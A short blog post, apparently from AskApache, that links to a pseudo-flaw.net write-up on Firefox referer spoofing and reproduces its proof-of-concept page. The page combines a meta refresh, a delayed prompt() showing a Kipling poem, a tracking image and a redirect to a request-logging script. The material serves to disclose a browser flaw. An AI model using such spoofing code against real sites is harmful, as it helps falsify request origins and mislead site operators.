Referer Spoofing Using JavaScript
« Tips on Writing WordPress PluginsReview: Posh CSS »
Just read an interesting article on the awesome pseudo-flaw.net that you might enjoy. Even though at the moment I’m more into AJAX and simple behavioural unobtrusive javascript as opposed to java, I still remember how excited I was back in 1995 when Sun released both beta and alpha Java versions to the public.. In fact I still have my Java 1.0 Unleashed book, which I’m looking at right now.
Javascript is such a fun language to play with and experiment with, I just don’t see the value in hacking javascript to do blackhat stuff.. I really don’t see the value in doing any blackhat stuff for the simple reason that its not worth the risk. I really admire the hackers who freely give their time, energy, and expertise to improve the security of free software such as Mozilla Firefox.. it’s fun to see what other people are discovering.. Check it.
<html>
<head><meta http-equiv="Refresh" content="1;url=http://www.askapache.com/">
</head>
<body>
<script defer="1">
setTimeout(function() {
// from The Jungle Book, by Rudyard Kipling
var text = "";
text += "At the hole where he went in\n";
text += "Red-Eye called to Wrinkle-Skin.\n";
text += "Hear what little Red-Eye saith:\n";
text += "\"Nag, come up and dance with death!\"\n";
text += "\n";
text += "Eye to eye and head to head,\n";
text += " (Keep the measure, Nag.)\n";
text += "This shall end when one is dead;\n";
text += " (At thy pleasure, Nag.)\n";
text += "Turn for turn and twist for twist-\n";
text += " (Run and hide thee, Nag.)\n";
text += "Hah! The hooded Death has missed!\n";
text += " (Woe betide thee, Nag!)\n";
prompt(text);
var t=new image();
t.src='http://topsites.blogflux.com/track_96716..gif';
location="http://pseudo-flaw.net/firefox-referer-spoofing/log-request-info.cgi?title=Request+Info:+Quickly";
}, 900);
</script>
</body>
</html>
« Tips on Writing WordPress Plugins
Review: Posh CSS »
Please consider donating to support active development of the free software and articles here.![]()
The power of the Web is in its universality. Access by everyone regardless of disability is an essential aspect. Tim Berners-Lee
No comments yet. Be the first!
It's very simple - you read the protocol and write the code. -Bill Joy
HTML | DCMI | GRDDL | XOXO | XDMP | XFN | DOM | XML | XHTML 1.1 Strict | CSS 2.1 | W3C | TLDP | WAI | DISA | ICSI | GIAC | SANS RR | GHOST | DEFCON | NIST | DHS CYBER | NIST | .:: Phrack Magazine ::.
↑ TOPExcept where otherwise noted, content on this site is licensed under a Creative Commons Attribution 3.0 License, just credit with a link.
This site is not supported or endorsed by The Apache Software Foundation (ASF). All software and documentation produced by The ASF is licensed. "Apache" is a trademark of The ASF. HTTPD based on NCSA HTTPd